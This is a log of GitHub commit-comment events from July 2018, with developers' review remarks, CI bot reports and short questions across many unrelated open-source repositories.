{"id":"8018485080","type":"CommitCommentEvent","actor":{"login":"VictoriaValentine"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29833932,"position":3,"line":3,"path":"making-of/brainstorm.md","commit_id":"8cc8b1605cdc68b55c126cbfaf7478f212ac7fad","created_at":"2018-07-25T19:14:40Z","updated_at":"2018-07-25T19:14:40Z","author_association":"COLLABORATOR","body":"Better late than never! Figuring this stuff out!"}},"created_at":"2018-07-25T19:14:40Z"}
{"id":"8018490116","type":"CommitCommentEvent","actor":{"login":"benjaminfuller"},"repo":{"name":"pacificr/Clusion"},"payload":{"comment":{"id":29833969,"position":null,"line":null,"path":null,"commit_id":"cf73c5d9a26f1211d40efc0dc3ce9382822bed63","created_at":"2018-07-25T19:15:41Z","updated_at":"2018-07-25T19:15:41Z","author_association":"NONE","body":"A few comments on this: \r\n\r\n1. It would be nice if the maven dependency can be sent to optional using a build parameter so if someone does not want to build the fuzzy code they don't have to get Jazzy.\r\n2. There are two points (edit distance and SoundEX) that are copies of online code.  For the SoundEX there is code that exists under the Apache license: https://commons.apache.org/proper/commons-codec/apidocs/org/apache/commons/codec/language/Soundex.html so I'd like to respect the apache license as much as possible.  For edit distance is it possible to find a library?  Its not clear that the edit distance code is open source and we are within rights to use it.\r\n3. Seems to require Mispelling rules which isn't part of the commit."}},"created_at":"2018-07-25T19:15:41Z"}
{"id":"8018490520","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29833972,"position":19,"line":19,"path":"testing/frr/frr","commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-25T19:15:45Z","updated_at":"2018-07-25T19:15:45Z","author_association":"MEMBER","body":"This is not a proper init script. It just delegates responsibility of init/RC system to the program, which is wrong. And using `exec` in OpenRC init script is certainly not allowed."}},"created_at":"2018-07-25T19:15:45Z"}
{"id":"8018493134","type":"CommitCommentEvent","actor":{"login":"MaryIsbell"},"repo":{"name":"noorka/SURF2018"},"payload":{"comment":{"id":29833994,"position":null,"line":null,"path":null,"commit_id":"416b4fa3e58e52eca1af45b93d0d038ffac7f8c7","created_at":"2018-07-25T19:16:19Z","updated_at":"2018-07-25T19:16:19Z","author_association":"NONE","body":"This looks great. You can say that the work is published on TAPAS and you can select a license at this link: [https://creativecommons.org/licenses/]\r\nI like the idea of a descriptive outline. I imagine you will be putting the outline within the editorial declaration?"}},"created_at":"2018-07-25T19:16:19Z"}
{"id":"8018495600","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29834017,"position":null,"line":null,"path":null,"commit_id":"155c30c73a19aaf847cb280091e5af1b26456692","created_at":"2018-07-25T19:16:50Z","updated_at":"2018-07-25T19:16:50Z","author_association":"COLLABORATOR","body":"Sagit"}},"created_at":"2018-07-25T19:16:50Z"}
{"id":"8018495824","type":"CommitCommentEvent","actor":{"login":"alexax66"},"repo":{"name":"danwood76/android_kernel_samsung_exynos7580-common"},"payload":{"comment":{"id":29834019,"position":null,"line":null,"path":null,"commit_id":"2fa5f4675331da5e38c3f00956b605cd33b4347f","created_at":"2018-07-25T19:16:52Z","updated_at":"2018-07-25T19:16:52Z","author_association":"NONE","body":"Nice! \r\nIt seems this patch fixed bug with locking of high CPU freq while screen is off"}},"created_at":"2018-07-25T19:16:52Z"}
{"id":"8018500890","type":"CommitCommentEvent","actor":{"login":"jeriveraf"},"repo":{"name":"commtech/synccom-linux"},"payload":{"comment":{"id":29834051,"position":null,"line":null,"path":null,"commit_id":"f143d170c666348fbe1678887b84c0b4091d0360","created_at":"2018-07-25T19:17:54Z","updated_at":"2018-07-25T19:17:54Z","author_association":"NONE","body":"This change needs to apply to all the IOCTL command that use arg as a pointer not just the ones changed here.   The memory that arg points to may be unpaged which would result in some very nasty undefined behavior.  In the case I ran into today the PC was rebooting when the IOCTL for SYNCCOM_GET_RX_MULTIPLE was called.  "}},"created_at":"2018-07-25T19:17:54Z"}
{"id":"8018504375","type":"CommitCommentEvent","actor":{"login":"Adamster"},"repo":{"name":"MegaMaer/AMD-Intership"},"payload":{"comment":{"id":29834060,"position":5,"line":22,"path":"CookApp/Cook.Repository/Repository.cs","commit_id":"ab5d122e2b020f11a55f45fecbc15cfa55ff0327","created_at":"2018-07-25T19:18:38Z","updated_at":"2018-07-25T19:18:38Z","author_association":"NONE","body":"да тут надо добавить параметр long Id"}},"created_at":"2018-07-25T19:18:38Z"}
{"id":"8018507065","type":"CommitCommentEvent","actor":{"login":"fespindola"},"repo":{"name":"gmoroncorrea/StockAssessmentAnchovyPeruChile"},"payload":{"comment":{"id":29834066,"position":null,"line":null,"path":null,"commit_id":"552a7eed347fd59ad9d83c4f0868c9ca3b95baae","created_at":"2018-07-25T19:19:13Z","updated_at":"2018-07-25T19:19:13Z","author_association":"COLLABORATOR","body":"model A"}},"created_at":"2018-07-25T19:19:13Z"}
{"id":"8018508426","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29834072,"position":null,"line":null,"path":null,"commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-25T19:19:30Z","updated_at":"2018-07-25T19:19:30Z","author_association":"MEMBER","body":"@fabled @ncopa Read all the comments above. This aport is total crap that should have never pass code review. This is the reason why I'm questioning Alpine more and more, why it causes my frustrations almost every time I look into commit history and why I'm not on IRC now. Absence of quality control demonstrated even by Alpine core developers and absolutely no progress on this. That's why I'm so angry sometimes, @ncopa.\r\n\r\n/cc @kaniini"}},"created_at":"2018-07-25T19:19:30Z"}
{"id":"8018512030","type":"CommitCommentEvent","actor":{"login":"amadeus"},"repo":{"name":"tpope/vim-fugitive"},"payload":{"comment":{"id":29834086,"position":null,"line":null,"path":null,"commit_id":"73c39195aee0c80f9ef3cd433ee315d72931864e","created_at":"2018-07-25T19:20:15Z","updated_at":"2018-07-25T19:20:15Z","author_association":"NONE","body":"It appears that after this commit - when pressing `<cr>` on a file within the `Gstatus` window, the file opens up within the small `Gstatus` split, and doesn't take over a larger buffer like it used too."}},"created_at":"2018-07-25T19:20:15Z"}
{"id":"8018513633","type":"CommitCommentEvent","actor":{"login":"Adamster"},"repo":{"name":"MegaMaer/AMD-Intership"},"payload":{"comment":{"id":29834090,"position":7,"line":7,"path":"CookApp/Cook.Domain/Product.cs","commit_id":"5942f4883c60022287bca7f4fd21257e059e9b6b","created_at":"2018-07-25T19:20:35Z","updated_at":"2018-07-25T19:20:35Z","author_association":"NONE","body":"не нужно это поле, перевод делается иначе, тема для отдельного разговора :)"}},"created_at":"2018-07-25T19:20:35Z"}
{"id":"8018515442","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834093,"position":24,"line":24,"path":"java-source/src/main/java/net/corda/training/state/IOUState.java","commit_id":"6ce4cf43e59f94b5a70db6404c27c41d5fbea865","created_at":"2018-07-25T19:20:58Z","updated_at":"2018-07-25T19:20:58Z","author_association":"NONE","body":"Why is this public?"}},"created_at":"2018-07-25T19:20:58Z"}
{"id":"8018518825","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834097,"position":31,"line":31,"path":"java-source/src/main/java/net/corda/training/state/IOUState.java","commit_id":"6ce4cf43e59f94b5a70db6404c27c41d5fbea865","created_at":"2018-07-25T19:21:43Z","updated_at":"2018-07-25T19:21:43Z","author_association":"NONE","body":"linearId should always default to a new UUID"}},"created_at":"2018-07-25T19:21:43Z"}
{"id":"8018520517","type":"CommitCommentEvent","actor":{"login":"Adamster"},"repo":{"name":"MegaMaer/AMD-Intership"},"payload":{"comment":{"id":29834106,"position":4,"line":12,"path":"CookApp/Cook.Domain/Group.cs","commit_id":"fe559adf04a51748403f9ccca26878140b8f0fb2","created_at":"2018-07-25T19:22:04Z","updated_at":"2018-07-25T19:22:04Z","author_association":"NONE","body":"и так понятно что Group, хватит Name-a"}},"created_at":"2018-07-25T19:22:04Z"}
{"id":"8018521384","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834111,"position":31,"line":31,"path":"java-source/src/main/java/net/corda/training/state/IOUState.java","commit_id":"6ce4cf43e59f94b5a70db6404c27c41d5fbea865","created_at":"2018-07-25T19:22:15Z","updated_at":"2018-07-25T19:22:15Z","author_association":"NONE","body":"This is only for states where there is a non-zero paid amount, otherwise default to 0. "}},"created_at":"2018-07-25T19:22:15Z"}
{"id":"8018523742","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834121,"position":30,"line":30,"path":"java-source/src/main/java/net/corda/training/state/IOUState.java","commit_id":"6ce4cf43e59f94b5a70db6404c27c41d5fbea865","created_at":"2018-07-25T19:22:45Z","updated_at":"2018-07-25T19:22:45Z","author_association":"NONE","body":"This is only for non zero paid states. Update is taking care of in the copy methods."}},"created_at":"2018-07-25T19:22:45Z"}
{"id":"8018555102","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834221,"position":38,"line":38,"path":"java-source/src/test/java/net/corda/training/state/IOUStateTests.java","commit_id":"afefbf48c2fdd82a60ec7c205756e484b003a5d9","created_at":"2018-07-25T19:29:21Z","updated_at":"2018-07-25T19:29:21Z","author_association":"NONE","body":"No need to catch and translate this exception. If this throws we want the test to crash. Besides, this is not runtime so a RuntimeException does not make sense."}},"created_at":"2018-07-25T19:29:21Z"}
{"id":"8018557108","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834223,"position":55,"line":55,"path":"java-source/src/test/java/net/corda/training/state/IOUStateTests.java","commit_id":"afefbf48c2fdd82a60ec7c205756e484b003a5d9","created_at":"2018-07-25T19:29:47Z","updated_at":"2018-07-25T19:29:47Z","author_association":"NONE","body":"Ditto ^^"}},"created_at":"2018-07-25T19:29:47Z"}
{"id":"8018558054","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834225,"position":72,"line":72,"path":"java-source/src/test/java/net/corda/training/state/IOUStateTests.java","commit_id":"afefbf48c2fdd82a60ec7c205756e484b003a5d9","created_at":"2018-07-25T19:29:58Z","updated_at":"2018-07-25T19:29:58Z","author_association":"NONE","body":"Ditto ^^"}},"created_at":"2018-07-25T19:29:58Z"}
{"id":"8018558603","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834228,"position":100,"line":100,"path":"java-source/src/test/java/net/corda/training/state/IOUStateTests.java","commit_id":"afefbf48c2fdd82a60ec7c205756e484b003a5d9","created_at":"2018-07-25T19:30:05Z","updated_at":"2018-07-25T19:30:05Z","author_association":"NONE","body":"Ditto ^^"}},"created_at":"2018-07-25T19:30:05Z"}
{"id":"8018571727","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834257,"position":157,"line":157,"path":"java-source/src/test/java/net/corda/training/state/IOUStateTests.java","commit_id":"afefbf48c2fdd82a60ec7c205756e484b003a5d9","created_at":"2018-07-25T19:32:49Z","updated_at":"2018-07-25T19:32:49Z","author_association":"NONE","body":"Ditto ^^"}},"created_at":"2018-07-25T19:32:49Z"}
{"id":"8018572890","type":"CommitCommentEvent","actor":{"login":"bosunski"},"repo":{"name":"joomla-projects/gsoc18_cli_update"},"payload":{"comment":{"id":29834262,"position":null,"line":null,"path":null,"commit_id":"8beba78bf9dbb52a14f6265ef7a7975d326e4ae7","created_at":"2018-07-25T19:33:04Z","updated_at":"2018-07-25T19:33:04Z","author_association":"CONTRIBUTOR","body":"I will get that added soon"}},"created_at":"2018-07-25T19:33:04Z"}
{"id":"8018573810","type":"CommitCommentEvent","actor":{"login":"EmadAlblueshi"},"repo":{"name":"reactiverse/reactive-pg-client"},"payload":{"comment":{"id":29834263,"position":5,"line":684,"path":"src/main/java/io/reactiverse/pgclient/Tuple.java","commit_id":"214bef504946207339815cb23d88dc2c529f2906","created_at":"2018-07-25T19:33:16Z","updated_at":"2018-07-25T19:33:16Z","author_association":"COLLABORATOR","body":"This is should be in different PR"}},"created_at":"2018-07-25T19:33:16Z"}
{"id":"8018573988","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834264,"position":182,"line":182,"path":"java-source/src/test/java/net/corda/training/state/IOUStateTests.java","commit_id":"afefbf48c2fdd82a60ec7c205756e484b003a5d9","created_at":"2018-07-25T19:33:19Z","updated_at":"2018-07-25T19:33:19Z","author_association":"NONE","body":"Ditto ^^"}},"created_at":"2018-07-25T19:33:19Z"}
{"id":"8018576579","type":"CommitCommentEvent","actor":{"login":"barthalion"},"repo":{"name":"flathub/org.gnome.chess"},"payload":{"comment":{"id":29834275,"position":null,"line":null,"path":null,"commit_id":"0bbb749548679a52a4438d94034739d443b56eef","created_at":"2018-07-25T19:33:55Z","updated_at":"2018-07-25T19:33:55Z","author_association":"MEMBER","body":"Ah, right, missed it. I will fix it in the morning."}},"created_at":"2018-07-25T19:33:55Z"}
{"id":"8018576703","type":"CommitCommentEvent","actor":{"login":"kevmoo"},"repo":{"name":"dart-lang/pub_semver"},"payload":{"comment":{"id":29834276,"position":6,"line":6,"path":".travis.yml","commit_id":"7b2549d1f57d9311f5525c761ce7627bdb6e6d27","created_at":"2018-07-25T19:33:56Z","updated_at":"2018-07-25T19:33:56Z","author_association":"MEMBER","body":"If you're bored. 😄 "}},"created_at":"2018-07-25T19:33:56Z"}
{"id":"8018577470","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834280,"position":null,"line":null,"path":null,"commit_id":"afefbf48c2fdd82a60ec7c205756e484b003a5d9","created_at":"2018-07-25T19:34:07Z","updated_at":"2018-07-25T19:34:07Z","author_association":"NONE","body":"Looks good. I trust these tests all passed?"}},"created_at":"2018-07-25T19:34:07Z"}
{"id":"8018581684","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834286,"position":32,"line":32,"path":"java-source/src/main/java/net/corda/training/contract/IOUContract.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-25T19:35:00Z","updated_at":"2018-07-25T19:35:00Z","author_association":"NONE","body":"All of these should also implement TypeOnlyCommandData"}},"created_at":"2018-07-25T19:35:00Z"}
{"id":"8018582510","type":"CommitCommentEvent","actor":{"login":"nicoleputois"},"repo":{"name":"nicoleputois/nicoleputois"},"payload":{"comment":{"id":29834288,"position":null,"line":null,"path":null,"commit_id":"2f60e1fb477eb5f46a57ee3d5d3dc9e96de2cb0f","created_at":"2018-07-25T19:35:10Z","updated_at":"2018-07-25T19:35:10Z","author_association":"OWNER","body":"stdout option.maxbuffer"}},"created_at":"2018-07-25T19:35:10Z"}
{"id":"8018583314","type":"CommitCommentEvent","actor":{"login":"Effer"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29834289,"position":null,"line":null,"path":null,"commit_id":"8ddbadc8814994e5b8d6b14b0d7aa1054c305b1a","created_at":"2018-07-25T19:35:20Z","updated_at":"2018-07-25T19:35:20Z","author_association":"CONTRIBUTOR","body":"Why remove this plugin? Any issue?"}},"created_at":"2018-07-25T19:35:20Z"}
{"id":"8018584812","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29834291,"position":null,"line":null,"path":null,"commit_id":"9e06cecc9b47bdadff08e0e831c925e1a96c970c","created_at":"2018-07-25T19:35:38Z","updated_at":"2018-07-25T19:35:38Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-triag](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-triag).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-triag-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-25T19:35:38Z"}
{"id":"8018588640","type":"CommitCommentEvent","actor":{"login":"JonathanHaas"},"repo":{"name":"JonathanHaas/penn-today-ci"},"payload":{"comment":{"id":29834300,"position":null,"line":null,"path":null,"commit_id":"e3ea7a4be3131503f0dcc139a9c050be60d5a669","created_at":"2018-07-25T19:36:28Z","updated_at":"2018-07-25T19:36:28Z","author_association":"OWNER","body":"Created multidev environment [penn-today-ci#ci-1519](https://dashboard.pantheon.io/sites/4efb815f-6135-4a6f-97a8-9a974be0bd7a#ci-1519).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1519-penn-today-ci.pantheonsite.io/)"}},"created_at":"2018-07-25T19:36:28Z"}
{"id":"8018588921","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29834301,"position":null,"line":null,"path":null,"commit_id":"868a5c2b66e8625fc12b60823986776b45f48f39","created_at":"2018-07-25T19:36:31Z","updated_at":"2018-07-25T19:36:31Z","author_association":"CONTRIBUTOR","body":"Now the python script won't run."}},"created_at":"2018-07-25T19:36:31Z"}
{"id":"8018589938","type":"CommitCommentEvent","actor":{"login":"Loki-Astari"},"repo":{"name":"mpccelon/Examples"},"payload":{"comment":{"id":29834303,"position":null,"line":null,"path":null,"commit_id":"6fd6f4dcd111c136f11d48264bd3defaea674478","created_at":"2018-07-25T19:36:45Z","updated_at":"2018-07-25T19:36:45Z","author_association":"NONE","body":"You don't want to submit a pull request and get this fix merged back?"}},"created_at":"2018-07-25T19:36:45Z"}
{"id":"8018590294","type":"CommitCommentEvent","actor":{"login":"csgibson"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":29834304,"position":null,"line":null,"path":null,"commit_id":"6cf8700fd9fd096855d6510ceef9c1ff225f8e40","created_at":"2018-07-25T19:36:49Z","updated_at":"2018-07-25T19:36:49Z","author_association":"NONE","body":"This likely needs to be updated as well: https://getbootstrap.com/docs/4.1/getting-started/browsers-devices/#supported-browsers"}},"created_at":"2018-07-25T19:36:49Z"}
{"id":"8018590764","type":"CommitCommentEvent","actor":{"login":"bsuthersan"},"repo":{"name":"bsuthersan/QualitativeData"},"payload":{"comment":{"id":29834307,"position":null,"line":null,"path":null,"commit_id":"6212fb13482caf590fe0076c7e9f646db0e17e65","created_at":"2018-07-25T19:36:55Z","updated_at":"2018-07-25T19:36:55Z","author_association":"OWNER","body":"This data is sourced from: https://www.researchunbound.org.uk/self-directed-support/appendix-2-interview-transcript-with-disabled-young-person/"}},"created_at":"2018-07-25T19:36:55Z"}
{"id":"8018593455","type":"CommitCommentEvent","actor":{"login":"rvolosatovs"},"repo":{"name":"rycee/home-manager"},"payload":{"comment":{"id":29834310,"position":6,"line":12,"path":"modules/xresources.nix","commit_id":"cf80199bfcbcecf6be84fea122c66fc081c4edd3","created_at":"2018-07-25T19:37:31Z","updated_at":"2018-07-25T19:37:31Z","author_association":"CONTRIBUTOR","body":"I don't think this is correct. This will always evaluate to true(given L18) and hence this will always throw exception on encountering a list. The `map` was there for a reason."}},"created_at":"2018-07-25T19:37:31Z"}
{"id":"8018598261","type":"CommitCommentEvent","actor":{"login":"nikolay-advolodkin"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29834320,"position":null,"line":null,"path":null,"commit_id":"942b8a437bd1f646878331112828ada28588ec32","created_at":"2018-07-25T19:38:30Z","updated_at":"2018-07-25T19:38:30Z","author_association":"NONE","body":"@jimevans sorry, I should have explained better. The situation I'm facing is we actually have a host with a proxy that blocks all outgoing traffic to Sauce Labs.  I was trying this through DesiredCapabilities and then passing that to RemoteWebDriver. Like the code below:\r\n\r\n           `var proxy = new Proxy();\r\n            proxy.HttpProxy = \"http://localhost:8080/proxy\";\r\n            Uri bsuri = new Uri(\"http://ondemand.saucelabs.com:80/wd/hub\");\r\n            IWebDriver driver;\r\n            DesiredCapabilities caps = new DesiredCapabilities();\r\n            caps.SetCapability(CapabilityType.Proxy, proxy);\r\n            caps.SetCapability(CapabilityType.BrowserName, \"chrome\");\r\n            caps.SetCapability(CapabilityType.Version, \"60\");\r\n            caps.SetCapability(CapabilityType.Platform, \"Windows 10\");\r\n            caps.SetCapability(\"username\",\"nikolay\");\r\n            caps.SetCapability(\"accessKey\", \"0fd366b1\");\r\n            caps.SetCapability(\"name\", \"testing\");\r\n            caps.SetCapability(\"idleTimeout\", \"15\");\r\n            caps.SetCapability(\"extendedDebugging\", true);\r\n\r\n            driver = new RemoteWebDriver(bsuri, caps);`\r\nI hope that's a better explanation :)\r\nSo are you suggesting to use this constructor for my situation?\r\n`public RemoteWebDriver(DriverOptions options)`\r\nSo my code will look something like this:\r\n\r\n          `var chromeOptions = new ChromeOptions();\r\n            var proxy = new Proxy();\r\n            proxy.HttpProxy = \"\";\r\n            chromeOptions.Proxy = proxy;\r\n            driver = new RemoteWebDriver(new Uri(\"http://ondemand.saucelabs.com:80/wd/hub\"), \r\n            chromeOptions.ToCapabilities());`\r\nBy the way, thanks for taking the time to help me with this."}},"created_at":"2018-07-25T19:38:30Z"}
{"id":"8018600055","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29834325,"position":null,"line":null,"path":null,"commit_id":"72124256f99f539241a250150089890a8c53bfe7","created_at":"2018-07-25T19:38:54Z","updated_at":"2018-07-25T19:38:54Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/99/display/redirect) (on internal Jenkins) failed in stage 'Running XM tests on '10.9'' 🔥 : hudson.AbortException: Xamarin.Mac tests on macOS 10.7 failed (introspection)\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/99//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/72124256f99f539241a250150089890a8c53bfe7/99/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/72124256f99f539241a250150089890a8c53bfe7/99/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/72124256f99f539241a250150089890a8c53bfe7/99/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Xamarin.Mac tests on macOS 10.7 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/99/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.8 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/99/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.10 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/99/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.9 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/99/display/redirect) 🔥\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/72124256f99f539241a250150089890a8c53bfe7/99/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n1 tests failed, 160 tests passed.\n\n## Failed tests\n\n * System/iOS Unified 64-bits - simulator/Debug: Failed\n"}},"created_at":"2018-07-25T19:38:54Z"}
{"id":"8018600260","type":"CommitCommentEvent","actor":{"login":"stiansoevik"},"repo":{"name":"OpenZWave/open-zwave"},"payload":{"comment":{"id":29834328,"position":null,"line":null,"path":null,"commit_id":"f589374186594b1331852e9a01d7b3ad36dd07fb","created_at":"2018-07-25T19:38:57Z","updated_at":"2018-07-25T19:38:57Z","author_association":"NONE","body":"Hi, I am surprised - have you tested this and it works? I have been struggling a lot with inclusion of the keypad (see https://groups.google.com/forum/#!topic/openzwave/GhFLrGwlpaA)."}},"created_at":"2018-07-25T19:38:57Z"}
{"id":"8018608917","type":"CommitCommentEvent","actor":{"login":"bpeabody"},"repo":{"name":"bpeabody/test-sub"},"payload":{"comment":{"id":29834350,"position":null,"line":null,"path":null,"commit_id":"4fbf883e53f02e296ed75bfdcb7279fe60fc3ded","created_at":"2018-07-25T19:40:47Z","updated_at":"2018-07-25T19:40:47Z","author_association":"OWNER","body":"here is a comment"}},"created_at":"2018-07-25T19:40:47Z"}
{"id":"8018610574","type":"CommitCommentEvent","actor":{"login":"Klumbumbus"},"repo":{"name":"osmlab/editor-layer-index"},"payload":{"comment":{"id":29834355,"position":null,"line":null,"path":null,"commit_id":"41f701157129f4ab4df5e77cc5ecca2c751ea1b4","created_at":"2018-07-25T19:41:09Z","updated_at":"2018-07-25T19:41:09Z","author_association":"MEMBER","body":"problems with this change:\r\n- https://josm.openstreetmap.de/wiki/ImageryCompareIgnores?action=diff&version=486\r\n- https://josm.openstreetmap.de/wiki/ImageryCompareIgnores?action=diff&version=487\r\n- https://josm.openstreetmap.de/wiki/ImageryCompareIgnores?action=diff&version=489\r\n- https://josm.openstreetmap.de/wiki/ImageryCompareIgnores?sfp_email=&sfph_mail=&action=diff&version=491&old_version=489&sfp_email=&sfph_mail="}},"created_at":"2018-07-25T19:41:09Z"}
{"id":"8018614825","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29834365,"position":null,"line":null,"path":null,"commit_id":"73281ffba303cbd55bfa8f4e7e5646843f39866d","created_at":"2018-07-25T19:42:01Z","updated_at":"2018-07-25T19:42:01Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1697 of 1697 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-25T19:42:01Z"}
{"id":"8018622297","type":"CommitCommentEvent","actor":{"login":"mdo"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":29834396,"position":null,"line":null,"path":null,"commit_id":"6cf8700fd9fd096855d6510ceef9c1ff225f8e40","created_at":"2018-07-25T19:43:34Z","updated_at":"2018-07-25T19:43:34Z","author_association":"MEMBER","body":"@csgibson Can you open an issue please? Thanks!"}},"created_at":"2018-07-25T19:43:34Z"}
{"id":"8018624448","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834408,"position":51,"line":51,"path":"java-source/src/main/java/net/corda/training/contract/IOUContract.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-25T19:44:01Z","updated_at":"2018-07-25T19:44:01Z","author_association":"NONE","body":"Move this to the bottom of verify"}},"created_at":"2018-07-25T19:44:01Z"}
{"id":"8018624640","type":"CommitCommentEvent","actor":{"login":"SQLCrespi"},"repo":{"name":"SQLCrespi/material"},"payload":{"comment":{"id":29834409,"position":null,"line":null,"path":null,"commit_id":"313cf260920ee5bc0ade66ba34bae4456dc5f240","created_at":"2018-07-25T19:44:03Z","updated_at":"2018-07-25T19:44:03Z","author_association":"OWNER","body":"Banco de dados TSQL e ExBloB\r\n[Exblog_tsql.zip](https://github.com/SQLCrespi/material/files/2229285/Exblog_tsql.zip)\r\n\r\n[vendas.zip](https://github.com/SQLCrespi/material/files/2229287/vendas.zip)\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-25T19:44:03Z"}
